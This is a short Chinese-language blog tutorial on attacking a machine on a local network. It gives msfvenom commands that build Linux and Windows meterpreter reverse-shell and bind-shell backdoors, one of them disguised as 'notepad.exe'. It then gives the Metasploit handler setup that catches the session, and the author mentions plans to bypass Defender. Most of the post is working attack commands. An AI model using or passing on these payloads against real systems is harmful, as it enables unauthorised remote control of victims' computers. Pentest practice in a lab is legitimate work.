简单的内网一对一攻击流程

文章目录

  • 环境准备
  • 后门程序制作
    • linux后门
    • windows后门
  • kali设置监听

环境准备

攻击机:kali
目标机:win10 (关闭defender,杀毒软件)

后门程序制作

linux后门

反弹型 同一网段或攻击机在外网

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[kali ip] lport=[]  -f elf -o islinux

监听型 同一网段或攻击机在内网,目标机在外网

msfvenom -p linux/x86/meterpreter/bind_tcp lhost=[目标机 ip] lport=[]  -f elf -o islinux

windows后门

反弹型

msfvenom -p windows/meterpreter/reverse_tcp lhost=[攻击机 IP] lport=[端口] -f exe -o 要生成的文件名

监听型

msfvenom -p windows/x64/meterpreter_bind_tcp LHOST=[目标机 IP] LPORT=[端口] -f exe > notepad.exe 

将生成的后门程序放在目标机上

kali设置监听

启动msf
use exploit/multi/handler
set PAYLOAD 选择制作后门程序使用的payload
set LHOST 与制作后门程序时的ip和端口一致
set LPORT
set ExitOnSession false
exploit -j -z (放在后台运行)
run 直接运行在前台
简单的内网一对一攻击流程_第1张图片
后门程序被启动之后,就会看到一个meterpreter的会话。简单的内网一对一攻击流程_第2张图片
之后可以执行 help 查看meterpreter内置的很多功能及使用方法
有关提权的之后碰到再写 0.0
两个局域网可以借助一个公网ip和frp进行流量转发达到渗透目的。等我绕过defender再来更 0.0

你可能感兴趣的:(web)